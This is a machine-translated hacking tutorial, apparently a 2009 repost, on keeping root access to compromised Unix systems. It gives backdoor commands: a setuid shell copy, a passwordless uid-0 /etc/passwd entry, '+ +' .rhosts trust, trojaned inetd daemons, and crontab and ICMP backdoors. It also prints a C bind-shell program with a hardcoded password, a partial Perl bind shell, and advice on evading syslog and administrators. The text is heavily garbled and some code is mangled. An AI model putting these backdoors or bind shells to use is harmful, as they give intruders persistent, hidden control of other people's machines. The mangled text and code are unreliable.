*nux how to create a backdoor-a vulnerability warning-the black bar safety net

ID MYHACK58:62200924298
Type myhack58
Reporter 佚名
Modified 2009-08-15T00:00:00


Painstakingly(or ease of obtaining root after, Of course, want to long-term holding. To be later used to it. d0ing what u want t0 d0 :) the traditional method is to build a back door(backd00r). Even if the invasion is found, the better(advanced)back door still be able to make you again a relaxing break in -- Please remember: "we come back and we are the h. a. c. k. e. r" -- Create a back-door method is as follows: - 1. setuid

cp /bin/sh /tmp/. backdoor

chmod u+s /tmp/. backdoor

Add suid bit to the shell on, the most simple and convenient, but also the most easy to be ADM found find / -perm 4 0 0 0-print;at the same time in most of the SUNOS you will find can't setuid it.-- Suitable for the novice; and - 2. echo "zer9::0:0::/:/bin/csh" >> /etc/passwd, i.e. to the system to increase A The id is 0 for root)account, no password; also very easy to be found. - Suitable for the novice; and - 3. echo "+ zer9">>/. rhosts That is, the local named zer9 the user can directly rlogin target without a password at this time zer9 is equivalent to a password, do not know is not into it. The premise is the target of the port 512or513or514 opening. Note: If echo "+ +">>/. rhosts any user can rlogin to the target causes the target portal open, it is best not to; You can also echo "+ +">>/etc/hosts. equiv but this can not obtain root privileges; - for than the novice a little higher,than the intermediate level of the low a little guys; - 4. modify sendmail. cf add a"wiz" command; usage: telnet target 2 5 [enter] wiz[enter] This is me from the SAFEsuite learned but haven't tried; the more dangerous. Because almost all of the scanner will be spying on this vulnerability. But you can put the command itself, the other is not easy to guess name. More complex, dangerous, but ADM is not easy to find, hidden strong; you are only on your machine try it's okay;-- GU name think Italy, masters-level vulnerabilities; - 5. crack suck as inetd,login,... That installed their particular crowd version. You need to find the various versions of unix rootkits;and then were compiled; - if the target machine is not installed on the tripwire like the stuff, that hardly can be found. linux&sunos&freebsd may be good looking, but the other? Even if you find that you have the corresponding platform on the compiler? I have a computer running slackware,one running irix,one runningsunos,one running hpux,one running digits, unix,... hahhahha,I had that dream again.:) -- I personally think is the best method, but the implementation there is a certain risk you have to take into account if your Trojan error what to do-because everything we do must not damage the target machine on any data of the principle; - 6. ping rem0te backd00r Even if the firewall is also very little to prevent ICMP through, so the backdoor can bypass the firewall. Specific procedures you can be in the [THC] homepage found; I thought of another one direct use of the ping command is implemented by the firewall of the method: one in the firewall, one outside a firewall; in addition to the ICMP outside; leading to the firewall, all information is filtered away: (with a 60k data representative of length,10k data representative of the short; using a molar si coding; or other custom coding parties by ICMPinfo accept information ping 's data length);“the Dee, the Dee,Dee,Dee,Dee Dee Dee...""the Yangtze River the Yangtze River, I was the Yellow River--- fire me up! Fire me”(^o^);after a time I will by the program to implement verification of feasibility. (Technically there should be no difficulty - 7. rem0te shell I like most of the way. But due to bypassing the login,so use who can't see-that is, to avoid the utmp&utmpx&wtmp&wtmpx;but not completely avoid syslogd. ADM can still be in the/var/log/messages found You. However, there is a way you can thoroughly to completely bypass syslogd! And listen to the following one by one. bindshell to achieve in two ways: a. Replace inetd. conf not important services such as rlogind :)in inetd to accept the connect request,directly in the port use system("/bin/csh-i");direct spam out of a shell, b. Accept connect, at the high end of the spam out of a shell; More security:) Below I give a perl implementation without a socket libary support(pass on sunos5. 5. 1&slackware 2.0.33&irix6. 4&hpux10. 2)and a gnuc the implementation of the test on slackware 2.0.33&irix6. 4) --- the perl version of the installation method:

No need to compile it!!!! As long as the target machine has perl support is okay!

How to determine whether the perl: $/>perl [enter]

[ctrl-c] $/> - If you're on the /etc/inetd. conf the content is not very Mature,the following The method has the very big risk, exit(-1) please; - First, the source program is cut, the stored as you want to replace the daemon,such as in. rexecd or or in. rlogind ,in. pop2d.... It is best to already be ADM off, but not too noticeable daemon,note that it have to be TCP types. Then mv /usr/sbin/in. rexecd /usr/sbin/in. rexecd. bak :)) cp in. rexecd /usr/sbin/in. rexecd Then ps-aux|grep inetd;kill-HUP id(by inetd); okay! Even the /etc/inetd. conf do not change. To reiterate the point: regardless of in any case, we all want to make the greatest possible protection of the data! - Usage: nc target (such as 5 1 2) [enter] ur passwd [enter] (then u login in...:)

---- Cut Here------------------------------------------

!/ usr/bin/perl



rem0te bind shell

[perl version only tcp]




passed on allmost unix

greet tvan Hauser/[THC]

for his daemonshell.pl


d3f4ult p4sswd 1s "wh04r3u" (no quote);


if ($PASSWORD) { chop($pass=); if (crypt($pass, $PASSWORD) ne $PASSWORD) { exit 0; } exec $SHELL ; exit 0; }

---- Cut Here--------------------------------------------

The following is a for gnuc to the bindshell,first cut it,save as backdoor. c ,then cc backdoor. c-o backdoor other action just l1ke before; Usage: (exp:binding to in. rlogind (5 1 3)) nc target 5 1 3 //spam a shell on the high port; nc target 5 4 3 2 1 ur passwd (then u coming in...)

---- Cut Here-------------------------------------

/ * [ b i n d - s h e l l ] * by * zer9[FTT] * zer9@21cn.com test on slackware 2.0.33&irix6. 4(cc) cc backdoor. c-o backdoor u c4n p01nt t0 wh1ch p0rt th3 sh3ll t0 sp4m c0mm4nd l1n3: backdoor [port] d3fault p0rt 1s: 5 4 3 2 1 greets to b4b0 forhis b4b0. c m4yb3 1 c0uld s4y: "0k,b4b0. l1st3n c4r3fully;" s0rry,just a joke. * */








define PassWord "k1n90fth3w0rld"

/ u c4n us3 crypt l1b4ry t0 sh4d0w 1t /

define DefaultPort 5 4 3 2 1

/ d3f4ult b1nd1ng p0rt /

int main(int argc,char **argv) { int s,in_s; struct sockaddr_in server,client; int client_len,bindport; char recvbuf[1 0 0 0];

if(argc!= 2) bindport=DefaultPort; else bindport=atoi(argv[1]); if((s=socket(AF_INET,SOCK_STREAM,0))<0) { perror("socket"); return -1; } bzero((char )&server,sizeof(server)); bzero((char )&client,sizeof(client)); bzero(recvbuf,sizeof(recvbuf)); server. sin_family=AF_INET; server. sin_port=htons(bindport); server. sin_addr. server_address=INADDR_ANY; if(bind(s,(struct sockaddr )&server,sizeof(server))<0) { perror("bind"); return -1; } if(listen(s,3)!= 0) { perror("listen"); return -1; } client_len=sizeof(client); if((in_s=accept(s,(struct sockaddr )&client,&client_len))<0) { perror("accept"); return -1; } recv(in_s,recvbuf,sizeof(recvbuf),0); sleep(1); if((strlen(recvbuf)-1)==strlen(PassWord)) if(! strncmp(recvbuf,PassWord,strlen(PassWord))) { send(in_s,"0k4y! c0m1ng 1n...\n",2 5,0); close(0);close(1);close(2); dup2(in_s,0);dup2(in_s,1);dup2(in_s,2); execl("/bin/csh","/bin/csh",(char *)0); } close(s); close(in_s); return 0; }

---- Cut Here-------------------------------------------------

Using the above methods can not completely avoid the syslogd,because they are controlled by inetd start inetd to start them at the same time has to log out;bypass inetd will be able to completely avoid the syslog! The method is very simple, as long as directly in directly from the command line to start the routine 2(c)can, 1perl not are;however such a lot of trouble; once the ADM to turn off the computer play is over; the better the method is in the /etc/rc. d/the rc. local is added: virus & But even so, every time after also to restart once; a better approach is to write a fully functional(Backdoor capabilities^o^the daemon,completely solve this problem; but doing so with the hack inetd as a more efficient safe? -- 8. The eighth weapon is the crontab I only know the principle, not practice. Each to a certain time to be in the /etc/passwd adding a uid is 0 for root Of the user; time together will delete ,or create a suid's shell...in the mentioned in the preamble of the articles in detail; -- 9. There is no thought as to the system of a user sent an email,the OS will spam out a shell? Use the user's home directory . forward can be used up to this point. -- 1 to 0. Modify the kernel-the super master approach; 2.2. 0. unzip the file 5 0 several MB,see headache. Then jmp ffff0 :) (not see the content, but to see the size;[THC]recently a article about this. You have confidence in yourself, then you can look; -- 1 1. There is the use of the overflow program, although we generally use it to obtain root;but as long as the ADM && u there is no patch ,is always that we can use it, and the suid is different Is it not afraid to be find / -perm 4 0 0 0 found; generally only tripwire can be found.